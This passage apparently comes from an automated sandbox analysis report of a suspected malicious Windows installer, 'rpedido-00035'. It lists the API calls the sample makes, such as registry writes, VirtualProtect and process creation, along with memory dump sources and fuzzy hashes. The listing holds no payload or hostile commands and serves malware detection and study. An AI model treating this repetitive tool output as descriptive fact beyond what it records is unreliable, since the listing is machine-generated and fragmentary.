                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                          • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                          • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                          • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                          • Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
                                                          • Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                          • Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                          • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734
                                                          APIs
                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F7DB,0040CED0,004033C2,0040CED0,0040F7DB,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                          APIs
                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                          • Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
                                                          • Opcode Fuzzy Hash: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                          • Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                          APIs
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                            • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                            • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                            • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                            • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                          • Instruction ID: 78872c6594437c8f6fb94a475087433cb7c5ddb6828dda6eb17a8edff69df0b5
                                                          • Opcode Fuzzy Hash: b4474b7c365b70f9dc7c58f3b4c8f6c607978000052ce3e09dedc8896c81aea9
                                                          • Instruction Fuzzy Hash: 93F0F072905021DBCB20FBA58E848DE72B09F01328B2101BFF101F21D1C77C0E418AAE
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                          • Instruction ID: adf76bd272608bb1b99769d9a9b05885636640fbfa2c3f91bbd7a8ebdab0685d
                                                          • Opcode Fuzzy Hash: cb92cf7ccb1965bdce3badc7d49dd673c55c158fa478f1f9cab94f81649d65d9
                                                          • Instruction Fuzzy Hash: 45D0A773F141008BD720EBB8BE8945E73F8E7803193208837E102F11D1E578C8928A2D
                                                          APIs
                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AllocGlobal
                                                          • String ID:
                                                          • API String ID: 3761449716-0
                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                          • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                          • GetClientRect.USER32(?,?), ref: 004055FD
                                                          • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                          • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                          • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                            • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,?,004041A5), ref: 00404388
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405728
                                                          • ShowWindow.USER32(00000000), ref: 0040574C
                                                          • ShowWindow.USER32(?,00000008), ref: 00405751
                                                          • ShowWindow.USER32(00000008), ref: 0040579B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                          • CreatePopupMenu.USER32 ref: 004057E0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                          • GetWindowRect.USER32(?,?), ref: 00405814
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                          • OpenClipboard.USER32(00000000), ref: 00405875
                                                          • EmptyClipboard.USER32 ref: 0040587B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                          • CloseClipboard.USER32 ref: 004058D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: (7B${
                                                          • API String ID: 590372296-525222780
                                                          • Opcode ID: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                          • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                          • Opcode Fuzzy Hash: f086514403ad079958e05c79f9398a2ee239ec86c73215fd307c521ee98444fa
                                                          • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68
